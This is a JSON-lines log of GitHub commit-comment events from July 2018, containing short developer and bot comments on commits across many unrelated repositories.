{"id":"7933379715","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631970,"position":null,"line":null,"path":null,"commit_id":"ea420d8607c65cd75fce3eea1cceed3ed2c90142","created_at":"2018-07-08T05:08:20Z","updated_at":"2018-07-08T05:08:20Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1683 of 1683 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-08T05:08:20Z"}
{"id":"7933380287","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":29631971,"position":null,"line":null,"path":null,"commit_id":"445923a83ed5526c7953fe0d41cf2d4efcae37b2","created_at":"2018-07-08T05:08:59Z","updated_at":"2018-07-08T05:08:59Z","author_association":"MEMBER","body":"Maybe we need to consider to\r\nAdd a Function FileHas or so... that checks if the file has a string inside (and also returns False or None when it does not exist...)"}},"created_at":"2018-07-08T05:08:59Z"}
{"id":"7933380333","type":"CommitCommentEvent","actor":{"login":"lin714093880"},"repo":{"name":"luogu-dev/markdown-it-katex"},"payload":{"comment":{"id":29631972,"position":null,"line":null,"path":null,"commit_id":"9d6eec6f2d012baa3b01024058b789bc4a079442","created_at":"2018-07-08T05:09:01Z","updated_at":"2018-07-08T05:09:01Z","author_association":"MEMBER","body":"```markdown\r\n// use\r\n\\$233.5 to \\$ 233.6\r\n// instead of\r\n$233.5 to $233.6\r\n```"}},"created_at":"2018-07-08T05:09:01Z"}
{"id":"7933382229","type":"CommitCommentEvent","actor":{"login":"iamadamdev"},"repo":{"name":"iamadamdev/bypass-paywalls-firefox"},"payload":{"comment":{"id":29631973,"position":null,"line":null,"path":null,"commit_id":"d66bc0bbc4946f14a9dda15de3c65241bff1513d","created_at":"2018-07-08T05:10:58Z","updated_at":"2018-07-08T05:10:58Z","author_association":"OWNER","body":"works fine for me on http://www.businessinsider.com/prime-brokers-are-needed-in-the-bitcoin-market-2018-6\r\ndo you have ublock installed too?"}},"created_at":"2018-07-08T05:10:58Z"}
{"id":"7933383191","type":"CommitCommentEvent","actor":{"login":"gunj22"},"repo":{"name":"gunj22/BhanuCompleteGitBashTutorial"},"payload":{"comment":{"id":29631980,"position":4,"line":8,"path":"src/test/java/secondClass.java","commit_id":"2e5435b9d825920bb8778b3dc46ba0b4e1d1ed80","created_at":"2018-07-08T05:12:05Z","updated_at":"2018-07-08T05:12:05Z","author_association":"OWNER","body":"Adding by sumit bhasin\r\n"}},"created_at":"2018-07-08T05:12:05Z"}
{"id":"7933385290","type":"CommitCommentEvent","actor":{"login":"luyu1995"},"repo":{"name":"luyu1995/personalLibrary-"},"payload":{"comment":{"id":29631982,"position":null,"line":null,"path":null,"commit_id":"baac1cdee292d50ba569310d48cd54580ead58d4","created_at":"2018-07-08T05:14:13Z","updated_at":"2018-07-08T05:14:13Z","author_association":"OWNER","body":"在webStrom里面设置版本react JSX就可以"}},"created_at":"2018-07-08T05:14:13Z"}
{"id":"7933385792","type":"CommitCommentEvent","actor":{"login":"arcolinuxz"},"repo":{"name":"arcolinux/arcolinux-iso"},"payload":{"comment":{"id":29631983,"position":null,"line":null,"path":null,"commit_id":"35a470e02fb3fd8e179becc17ce02ee5005a9ec6","created_at":"2018-07-08T05:14:46Z","updated_at":"2018-07-08T05:14:46Z","author_association":"NONE","body":"checking for doubles in packages file"}},"created_at":"2018-07-08T05:14:46Z"}
{"id":"7933386981","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"XcodeGhostSource/XcodeGhost"},"payload":{"comment":{"id":29631989,"position":null,"line":null,"path":null,"commit_id":"e5b5273286916072cc25491fd187c64ba305427d","created_at":"2018-07-08T05:15:58Z","updated_at":"2018-07-08T05:15:58Z","author_association":"NONE","body":"iOS-11.1.2-15B202-Jailbreak-master-1"}},"created_at":"2018-07-08T05:15:58Z"}
{"id":"7933387427","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29631990,"position":null,"line":null,"path":null,"commit_id":"814175ef056cd2a06621385d18e9c9157ab49eb4","created_at":"2018-07-08T05:16:22Z","updated_at":"2018-07-08T05:16:22Z","author_association":"OWNER","body":"Derivatives of polymers metals scents folding heat and pressures to make appear as ironed washed and dried"}},"created_at":"2018-07-08T05:16:22Z"}
{"id":"7933391127","type":"CommitCommentEvent","actor":{"login":"SomGitHub2018"},"repo":{"name":"SomGitHub2018/Origin"},"payload":{"comment":{"id":29631997,"position":null,"line":null,"path":null,"commit_id":"7e71eb29408b35ae4b9ad211e75c2e9be97df1d9","created_at":"2018-07-08T05:20:03Z","updated_at":"2018-07-08T05:20:03Z","author_association":"OWNER","body":"Test Commit"}},"created_at":"2018-07-08T05:20:03Z"}
{"id":"7933401740","type":"CommitCommentEvent","actor":{"login":"varatharajans"},"repo":{"name":"varatharajans/Acadgild-Dataanalytics-session10-assignment"},"payload":{"comment":{"id":29632018,"position":null,"line":null,"path":null,"commit_id":"cf1eb6e0fc658ea2c38b74a71ddaea19df5b66ff","created_at":"2018-07-08T05:30:48Z","updated_at":"2018-07-08T05:30:48Z","author_association":"OWNER","body":"[Session 10  Assignment s.docx](https://github.com/varatharajans/Acadgild-Dataanalytics-session10-assignment/files/2173365/Session.10.Assignment.s.docx)\r\n[Session10 Assignment Markdown.docx](https://github.com/varatharajans/Acadgild-Dataanalytics-session10-assignment/files/2173366/Session10.Assignment.Markdown.docx)\r\n"}},"created_at":"2018-07-08T05:30:48Z"}
{"id":"7933409165","type":"CommitCommentEvent","actor":{"login":"wlsgussla123"},"repo":{"name":"yonghyun123/vue-practice"},"payload":{"comment":{"id":29632028,"position":null,"line":null,"path":null,"commit_id":"e02f999f7e819df3d5946076f7df4a1308140ece","created_at":"2018-07-08T05:38:56Z","updated_at":"2018-07-08T05:38:56Z","author_association":"NONE","body":"부트 과제를 vue로도 해보는건가요 "}},"created_at":"2018-07-08T05:38:56Z"}
{"id":"7933409896","type":"CommitCommentEvent","actor":{"login":"wlsgussla123"},"repo":{"name":"yonghyun123/javaWeb"},"payload":{"comment":{"id":29632030,"position":null,"line":null,"path":null,"commit_id":"2b3fef1c98c382fab2cedb66614749edd1a9857f","created_at":"2018-07-08T05:39:47Z","updated_at":"2018-07-08T05:39:47Z","author_association":"NONE","body":"너무 올린게 많아서 의도를 모르겠음요.. \r\n필요한 것만 올려주세요ㅠㅠ"}},"created_at":"2018-07-08T05:39:47Z"}
{"id":"7933410550","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"codeplea/genann"},"payload":{"comment":{"id":29632031,"position":6,"line":27,"path":"genann.h","commit_id":"eb56a6d9f217a33e5a11021b5f2f4189ba7d6221","created_at":"2018-07-08T05:40:25Z","updated_at":"2018-07-08T05:40:25Z","author_association":"NONE","body":"I suggest to [reconsider also this identifier](https://stackoverflow.com/questions/228783/what-are-the-rules-about-using-an-underscore-in-a-c-identifier#answer-228797 \"What are the rules about using an underscore in a C++ identifier?\") once more."}},"created_at":"2018-07-08T05:40:25Z"}
{"id":"7933414445","type":"CommitCommentEvent","actor":{"login":"Sricool38"},"repo":{"name":"Sricool38/LeenoxDemo"},"payload":{"comment":{"id":29632038,"position":null,"line":null,"path":null,"commit_id":"bff8c03d4e985c85b2909cd56f2da29a61b14829","created_at":"2018-07-08T05:44:38Z","updated_at":"2018-07-08T05:44:38Z","author_association":"OWNER","body":"To Navigate the pages and compare the product descriptions and product with home pages in leenox. "}},"created_at":"2018-07-08T05:44:38Z"}
{"id":"7933415913","type":"CommitCommentEvent","actor":{"login":"dn1z"},"repo":{"name":"mzfr/pgn2gif"},"payload":{"comment":{"id":29632046,"position":null,"line":null,"path":null,"commit_id":"b455aade3b6633d6078e5062339b3d0aca3c6090","created_at":"2018-07-08T05:46:16Z","updated_at":"2018-07-08T05:46:16Z","author_association":"NONE","body":"Thanks"}},"created_at":"2018-07-08T05:46:16Z"}
{"id":"7933417539","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29632049,"position":null,"line":null,"path":null,"commit_id":"9290bb76192afb16d7056589b4e3e7a1ba6d2930","created_at":"2018-07-08T05:48:07Z","updated_at":"2018-07-08T05:48:07Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - i386-Windows-7-VisualStudio-14: OK (2934 of 2935 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-08T05:48:07Z"}
{"id":"7933418227","type":"CommitCommentEvent","actor":{"login":"psharmadevops"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":29632050,"position":null,"line":null,"path":null,"commit_id":"1780ec4eb86d7e78dcaf8897a0ef550b3be2aa04","created_at":"2018-07-08T05:48:46Z","updated_at":"2018-07-08T05:48:46Z","author_association":"NONE","body":"@ryansb  Patch still does not help in showing plan output in stdout"}},"created_at":"2018-07-08T05:48:46Z"}
{"id":"7933420519","type":"CommitCommentEvent","actor":{"login":"dideex"},"repo":{"name":"dideex/react-intensive"},"payload":{"comment":{"id":29632051,"position":47,"line":47,"path":"src/components/Slider.js","commit_id":"d27f8068ec8fc8f07cbabadbbbd35d6cd4a95467","created_at":"2018-07-08T05:51:04Z","updated_at":"2018-07-08T05:51:04Z","author_association":"OWNER","body":"Мутировать стейт руками? Интенсив по антиреакту какой-то ..."}},"created_at":"2018-07-08T05:51:04Z"}
{"id":"7933420605","type":"CommitCommentEvent","actor":{"login":"zhenyuw16"},"repo":{"name":"AlbertHuyb/MIPS"},"payload":{"comment":{"id":29632052,"position":null,"line":null,"path":null,"commit_id":"2fc6def654a18f280a003b2daa6d6eda065261e9","created_at":"2018-07-08T05:51:11Z","updated_at":"2018-07-08T05:51:11Z","author_association":"COLLABORATOR","body":"datamem, compiler, MIPS, UART, Peripheral"}},"created_at":"2018-07-08T05:51:11Z"}
{"id":"7933420965","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29632054,"position":14,"line":203,"path":"mono/utils/mono-mmap.c","commit_id":"a502768b3a24f4251de6a48ba78a27c898968e63","created_at":"2018-07-08T05:51:38Z","updated_at":"2018-07-08T05:51:38Z","author_association":"MEMBER","body":"Can/should we restrict the code to x86/amd64? I.e. no jit on arm/arm64. I understand..maybe what you have is better, the ifdef map_jit."}},"created_at":"2018-07-08T05:51:38Z"}
{"id":"7933421218","type":"CommitCommentEvent","actor":{"login":"o-water-o"},"repo":{"name":"o-water-o/Daily-life"},"payload":{"comment":{"id":29632055,"position":null,"line":null,"path":null,"commit_id":"42e3c9cc97c7317af6289fe638d4df7ad35ef4f0","created_at":"2018-07-08T05:51:56Z","updated_at":"2018-07-08T05:51:56Z","author_association":"OWNER","body":"windows批处理脚本"}},"created_at":"2018-07-08T05:51:56Z"}
{"id":"7933422351","type":"CommitCommentEvent","actor":{"login":"dideex"},"repo":{"name":"dideex/react-intensive"},"payload":{"comment":{"id":29632057,"position":9,"line":9,"path":"src/components/Slider.js","commit_id":"d27f8068ec8fc8f07cbabadbbbd35d6cd4a95467","created_at":"2018-07-08T05:53:14Z","updated_at":"2018-07-08T05:53:14Z","author_association":"OWNER","body":"class Slider extends React.Component {\r\nКакой смысл тогда в 1ой строке диструктуризировать Component?"}},"created_at":"2018-07-08T05:53:14Z"}
{"id":"7933426248","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29632059,"position":16,"line":16,"path":"_projects/i_gitt_scm_support.md","commit_id":"e350cba902a070c57c463d4c7f864e185cfe9992","created_at":"2018-07-08T05:57:36Z","updated_at":"2018-07-08T05:57:36Z","author_association":"NONE","body":"I think we probably might also wanna change this line and others to wrap into 80-chars c.f https://raw.githubusercontent.com/coala/projects/master/_projects/convert_bear_to_aspects.md"}},"created_at":"2018-07-08T05:57:36Z"}
{"id":"7933429440","type":"CommitCommentEvent","actor":{"login":"yuzi-co"},"repo":{"name":"RainbowMiner/RainbowMiner"},"payload":{"comment":{"id":29632078,"position":5,"line":13,"path":"Miners/Ewbf.ps1","commit_id":"4e218693964ca11a334bef2f31079381afc56d84","created_at":"2018-07-08T06:00:52Z","updated_at":"2018-07-08T06:00:52Z","author_association":"NONE","body":"96_5, not 95_5 :)"}},"created_at":"2018-07-08T06:00:52Z"}
{"id":"7933432245","type":"CommitCommentEvent","actor":{"login":"chenwei-tw"},"repo":{"name":"r06922094/gan-gpu-scheduling"},"payload":{"comment":{"id":29632082,"position":null,"line":null,"path":null,"commit_id":"0f795787292f341defaec4e53ce4551c56bcfa8c","created_at":"2018-07-08T06:04:03Z","updated_at":"2018-07-08T06:04:03Z","author_association":"NONE","body":"Try to write what do you do on this commit rather than this one like \"Update XXX file\". \r\n\r\nYou can type the following command to modify the message of latest commit:\r\n`$ git commit --amend`\r\n`$ git push -f origin <branch>`\r\nUse these commands carefully!"}},"created_at":"2018-07-08T06:04:03Z"}
{"id":"7933434251","type":"CommitCommentEvent","actor":{"login":"lamquangminh"},"repo":{"name":"lamquangminh/EVKey"},"payload":{"comment":{"id":29632083,"position":null,"line":null,"path":null,"commit_id":"969e894856e409d7ed631b74d503e5660526b4ea","created_at":"2018-07-08T06:06:13Z","updated_at":"2018-07-08T06:06:13Z","author_association":"OWNER","body":"Tại mình chưa rành github, bỏ vào release đó có download direct được không ?\r\nTại mình có thử vào release đó nhưng ko biết up release lên sao?\r\nCái này mục đích là để phần auto update nó tự tải về thôi"}},"created_at":"2018-07-08T06:06:13Z"}
{"id":"7933438848","type":"CommitCommentEvent","actor":{"login":"HeberTorres"},"repo":{"name":"HeberTorres/Intro-to-Java-Programming"},"payload":{"comment":{"id":29632087,"position":null,"line":null,"path":null,"commit_id":"1ece53a22de070e8894a1d8901ee1c51b39dde92","created_at":"2018-07-08T06:11:18Z","updated_at":"2018-07-08T06:11:18Z","author_association":"OWNER","body":"unit conversion, 1hr = 60min then, 45.5min = 0.75hrs"}},"created_at":"2018-07-08T06:11:18Z"}
{"id":"7933439412","type":"CommitCommentEvent","actor":{"login":"makisarun"},"repo":{"name":"makisarun/repo1renamed"},"payload":{"comment":{"id":29632088,"position":null,"line":null,"path":null,"commit_id":"d5ec92d0e742f6216bff55a2defdced124361716","created_at":"2018-07-08T06:11:53Z","updated_at":"2018-07-08T06:11:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [test](https://trello.com/c/F7jrMwPF/2-test)"}},"created_at":"2018-07-08T06:11:53Z"}
{"id":"7933439887","type":"CommitCommentEvent","actor":{"login":"makisarun"},"repo":{"name":"makisarun/repo1renamed"},"payload":{"comment":{"id":29632090,"position":null,"line":null,"path":null,"commit_id":"d5ec92d0e742f6216bff55a2defdced124361716","created_at":"2018-07-08T06:12:21Z","updated_at":"2018-07-08T06:12:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [test](https://trello.com/c/F7jrMwPF/2-test)"}},"created_at":"2018-07-08T06:12:21Z"}
{"id":"7933440527","type":"CommitCommentEvent","actor":{"login":"m3x1can77"},"repo":{"name":"m3x1can77/practicas"},"payload":{"comment":{"id":29632091,"position":null,"line":null,"path":null,"commit_id":"774aa6077950890faaf171491243f21969fd7944","created_at":"2018-07-08T06:13:04Z","updated_at":"2018-07-08T06:13:04Z","author_association":"OWNER","body":"estas son practicas para programar\r\n"}},"created_at":"2018-07-08T06:13:04Z"}
{"id":"7933440727","type":"CommitCommentEvent","actor":{"login":"abhiroyal"},"repo":{"name":"abhiroyal/PolyLineTask"},"payload":{"comment":{"id":29632092,"position":null,"line":null,"path":null,"commit_id":"4b3c2b7fa47fab01d024da6428063e1824c72b65","created_at":"2018-07-08T06:13:16Z","updated_at":"2018-07-08T06:13:16Z","author_association":"OWNER","body":"RedeemFile Added"}},"created_at":"2018-07-08T06:13:16Z"}
{"id":"7933440811","type":"CommitCommentEvent","actor":{"login":"Koh0214"},"repo":{"name":"Koh0214/narou-matome"},"payload":{"comment":{"id":29632093,"position":null,"line":null,"path":null,"commit_id":"712209e244e08e3e9cd59316b89088c6bc5fb8ab","created_at":"2018-07-08T06:13:22Z","updated_at":"2018-07-08T06:13:22Z","author_association":"OWNER","body":"with bootstrap4"}},"created_at":"2018-07-08T06:13:22Z"}
{"id":"7933441022","type":"CommitCommentEvent","actor":{"login":"superdopenoob"},"repo":{"name":"JonnyKong/Introduction-to-Computer-Systems"},"payload":{"comment":{"id":29632094,"position":2,"line":99,"path":"README.md","commit_id":"5bf1400f6b6dfe498630e2891806942fc217d7f1","created_at":"2018-07-08T06:13:36Z","updated_at":"2018-07-08T06:13:36Z","author_association":"NONE","body":"加油，朋友，喜欢你"}},"created_at":"2018-07-08T06:13:36Z"}
{"id":"7933442060","type":"CommitCommentEvent","actor":{"login":"fanyanan-145225"},"repo":{"name":"gaopu/Java"},"payload":{"comment":{"id":29632095,"position":null,"line":null,"path":null,"commit_id":"7e091b77a43a62fdf3a8b3fbea07d8dee67c0618","created_at":"2018-07-08T06:14:45Z","updated_at":"2018-07-08T06:14:45Z","author_association":"NONE","body":"What is this?"}},"created_at":"2018-07-08T06:14:45Z"}
{"id":"7933445522","type":"CommitCommentEvent","actor":{"login":"dengchao-ryan"},"repo":{"name":"dengchao-ryan/AngularLean"},"payload":{"comment":{"id":29632105,"position":null,"line":null,"path":null,"commit_id":"88f1d036dddce38a8e61de2055eb5756169bcb03","created_at":"2018-07-08T06:18:30Z","updated_at":"2018-07-08T06:18:30Z","author_association":"OWNER","body":"在这里，添加了路由功能，其实就是一个URL跳转。将三个练习的视图分隔开，使用单独的视图进行显示，便于调试编码。其具体配置在文件顶级目录sec/app下的app-routing.module.ts中"}},"created_at":"2018-07-08T06:18:30Z"}
{"id":"7933446397","type":"CommitCommentEvent","actor":{"login":"somratking420"},"repo":{"name":"somratking420/callblocker"},"payload":{"comment":{"id":29632109,"position":null,"line":null,"path":null,"commit_id":"ce763276d133b345062259967c840f392aba4093","created_at":"2018-07-08T06:19:28Z","updated_at":"2018-07-08T06:19:28Z","author_association":"OWNER","body":"![150asset 1](https://user-images.githubusercontent.com/40878798/42417316-01d8bb0e-82a9-11e8-83ee-2d0591513c6e.png)\r\n![721asset 2](https://user-images.githubusercontent.com/40878798/42417318-02bbe99c-82a9-11e8-8678-838a3e4dab23.png)\r\n![300asset 1](https://user-images.githubusercontent.com/40878798/42417327-12911338-82a9-11e8-9539-3aaf53a51058.png)\r\n"}},"created_at":"2018-07-08T06:19:28Z"}
{"id":"7933447812","type":"CommitCommentEvent","actor":{"login":"akiernan"},"repo":{"name":"ostreedev/ostree"},"payload":{"comment":{"id":29632111,"position":17,"line":64,"path":"src/switchroot/ostree-system-generator.c","commit_id":"587bb67597a108eeeee1b874a8e2e432079b61ab","created_at":"2018-07-08T06:21:01Z","updated_at":"2018-07-08T06:21:01Z","author_association":"CONTRIBUTOR","body":"Something I wasn't clear on, would this need changing to EXIT_SUCCESS if this patch moves forward?"}},"created_at":"2018-07-08T06:21:01Z"}
{"id":"7933448129","type":"CommitCommentEvent","actor":{"login":"dengchao-ryan"},"repo":{"name":"dengchao-ryan/AngularLean"},"payload":{"comment":{"id":29632112,"position":null,"line":null,"path":null,"commit_id":"b5ef7f5a156d418e54355c8a8ade644abbd5eaaf","created_at":"2018-07-08T06:21:22Z","updated_at":"2018-07-08T06:21:22Z","author_association":"OWNER","body":"这里主要是修改ts文件的包路径，便于管理"}},"created_at":"2018-07-08T06:21:22Z"}
{"id":"7933448997","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29632114,"position":null,"line":null,"path":null,"commit_id":"92f2bb51fa8154f0edbdccdef1967c6169eef204","created_at":"2018-07-08T06:22:18Z","updated_at":"2018-07-08T06:22:18Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: libraries/classes/Header.php"}},"created_at":"2018-07-08T06:22:18Z"}
{"id":"7933450280","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29632116,"position":772,"line":957,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T06:23:40Z","updated_at":"2018-07-08T06:23:40Z","author_association":"NONE","body":"RFC5969 defines that the delegated prefix:\r\n* SHOULD be 64 or smaller to allow SLAAC in section 4 paragraph 2\r\n* MUST be less than or equal to 128 (duh) in section 7.1.1 (definition of 6rdPrefixLen in DHCPv4 Option 212)\r\n\r\nSo this check is not compliant with the RFC and may not work in all setups."}},"created_at":"2018-07-08T06:23:40Z"}
{"id":"7933457195","type":"CommitCommentEvent","actor":{"login":"Rick1715"},"repo":{"name":"Rick1715/test"},"payload":{"comment":{"id":29632128,"position":null,"line":null,"path":null,"commit_id":"b4c4d9117e9007cacac14b94e81b2aaf9cb2793a","created_at":"2018-07-08T06:30:07Z","updated_at":"2018-07-08T06:30:07Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-08T06:30:07Z"}
{"id":"7933457249","type":"CommitCommentEvent","actor":{"login":"dengchao-ryan"},"repo":{"name":"dengchao-ryan/AngularLean"},"payload":{"comment":{"id":29632129,"position":null,"line":null,"path":null,"commit_id":"893387d93b283daec586ac5cbe6079c1804973f1","created_at":"2018-07-08T06:30:09Z","updated_at":"2018-07-08T06:30:09Z","author_association":"OWNER","body":"将之前由一个Component显示的部分分担到子组件去，让其有足够的精力完成某一任务的完成。组件间使用@Input装饰器进行修饰。实际上，有@Input修饰的属性，就是将这个属性注入到标签上，以供外界使用，例如：在组件<app-child>中的Component中声明一个属性：@Input() childData: any；它表示将属性data放到标签中，外界可以这样用：<app-child [childData]=\"parentData\"></app-child>。具体使用方法可以参考grade-btn-component、grade-tabComponent、grade-score-component中的具体例子实现。\r\n欢迎指教，谢谢！"}},"created_at":"2018-07-08T06:30:09Z"}
{"id":"7933457897","type":"CommitCommentEvent","actor":{"login":"Rick1715"},"repo":{"name":"Rick1715/test"},"payload":{"comment":{"id":29632132,"position":null,"line":null,"path":null,"commit_id":"d93fae7df3effa58c5dbd6d3ab606eb814a19322","created_at":"2018-07-08T06:30:39Z","updated_at":"2018-07-08T06:30:39Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-08T06:30:39Z"}
{"id":"7933458388","type":"CommitCommentEvent","actor":{"login":"eMPee584"},"repo":{"name":"ranger/ranger"},"payload":{"comment":{"id":29632133,"position":null,"line":null,"path":null,"commit_id":"f9a5a4b6189d5e04bf429bdab8ce7369b889c9f5","created_at":"2018-07-08T06:31:06Z","updated_at":"2018-07-08T06:31:06Z","author_association":"CONTRIBUTOR","body":":+1: "}},"created_at":"2018-07-08T06:31:06Z"}
{"id":"7933459036","type":"CommitCommentEvent","actor":{"login":"gfbhsiao"},"repo":{"name":"gfbhsiao/handwash"},"payload":{"comment":{"id":29632134,"position":null,"line":null,"path":null,"commit_id":"f6be3145093b129ddefb82602c250ffac612ac79","created_at":"2018-07-08T06:31:45Z","updated_at":"2018-07-08T06:31:45Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-08T06:31:45Z"}
{"id":"7933459967","type":"CommitCommentEvent","actor":{"login":"AKryukov92"},"repo":{"name":"YMnkf/java18may"},"payload":{"comment":{"id":29632137,"position":35,"line":35,"path":"Java18_05_2018/src/LR8/Task8.java","commit_id":"ca1b29f23027fbbf3d71c2722833e3b70362886f","created_at":"2018-07-08T06:32:43Z","updated_at":"2018-07-08T06:32:43Z","author_association":"CONTRIBUTOR","body":"Кажется эти команды лишние в решении задачи №8."}},"created_at":"2018-07-08T06:32:43Z"}
{"id":"7933462963","type":"CommitCommentEvent","actor":{"login":"shancarpenter42"},"repo":{"name":"darshanparajuli/LogcatReader"},"payload":{"comment":{"id":29632144,"position":2,"line":58,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"3ed82e6bb203343665358f8072c61b27250aa534","created_at":"2018-07-08T06:35:41Z","updated_at":"2018-07-08T06:35:41Z","author_association":"NONE","body":" darshanparajuli / LogcatReader\r\nCode  Issues 6  Pull requests 0  Projects 0  Pulse\r\n LogcatReader/ 3ed82e6\r\nadded translations via google translate, needs revision by someone wh…\r\n\r\n…o actually knows Russian\r\n@darshanparajulidarshanparajuli committed 4 months ago\r\napp/src/main/res/values-ru/strings.xml\r\n@@ -57,4 +57,11 @@\r\n     <string name=\"pref_key_about_github_repo_summary\">Посмотреть код, задать вопрос, и т.д.</string>\r\n     <string name=\"filter\">Фильтр</string>\r\n\r\nLeave a line note\r\n Cancel  Leave line note\r\n     <string name=\"empty\">пустой</string>\r\n+    <string name=\"delete\">Удалить</string>\r\n+    <string name=\"share\">Поделиться</string>\r\n+    <string name=\"save\">Сохранить</string>\r\n+    <string name=\"error\">ошибка</string>\r\n+    <string name=\"saved\">Сохраненный</string>\r\n+    <string name=\"error_saving\">Ошибка при сохранении</string>\r\n+    <string name=\"external_storage_not_mounted_error\">Внешнее хранилище не установлено</string>\r\n </resources> \r\n0 comments on commit 3ed82e6\r\nComment on 3ed82e6\r\n\r\nLeave a comment\r\nComment\r\n Desktop version Sign out"}},"created_at":"2018-07-08T06:35:41Z"}
{"id":"7933463300","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29632146,"position":null,"line":null,"path":null,"commit_id":"2245a04feecfe66e6fbcf6e05fa5b2883773e4b5","created_at":"2018-07-08T06:36:03Z","updated_at":"2018-07-08T06:36:03Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/2245a04feecfe66e6fbcf6e05fa5b2883773e4b5#commitcomment-29631833) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/c9f5247c5d37986f977721baf9176220c96ff3ab/daily_2018_7_8/report.md). cc @ararslan"}},"created_at":"2018-07-08T06:36:03Z"}
{"id":"7933463339","type":"CommitCommentEvent","actor":{"login":"PriestTomb"},"repo":{"name":"PriestTomb/PriestTomb.github.io"},"payload":{"comment":{"id":29632147,"position":null,"line":null,"path":null,"commit_id":"efc41a267bc7f0df0d43e0fc3d50131c2a458ce1","created_at":"2018-07-08T06:36:06Z","updated_at":"2018-07-08T06:36:06Z","author_association":"OWNER","body":"取IP  不是取API 手抖写错。。"}},"created_at":"2018-07-08T06:36:06Z"}
{"id":"7933463973","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29632152,"position":784,"line":969,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T06:36:42Z","updated_at":"2018-07-08T06:36:42Z","author_association":"NONE","body":"I think this assumes (particularly Line 984) that either the SP ipv6 prefix or the ipv4 prefix is aligned. But both can be unaligned at the same time. the SP ipv6 prefix can be a /21 and the ipv4 prefix a /27 which makes the delegated prefix length 48 and residue magically becomes 0."}},"created_at":"2018-07-08T06:36:42Z"}
{"id":"7933465253","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29632156,"position":null,"line":null,"path":null,"commit_id":"9f558d7e74118d8dc0cb1db04f2b7200f5a3618c","created_at":"2018-07-08T06:38:01Z","updated_at":"2018-07-08T06:38:01Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/bug-in-displaying-title-with-arabic-character/91798/2\n"}},"created_at":"2018-07-08T06:38:01Z"}
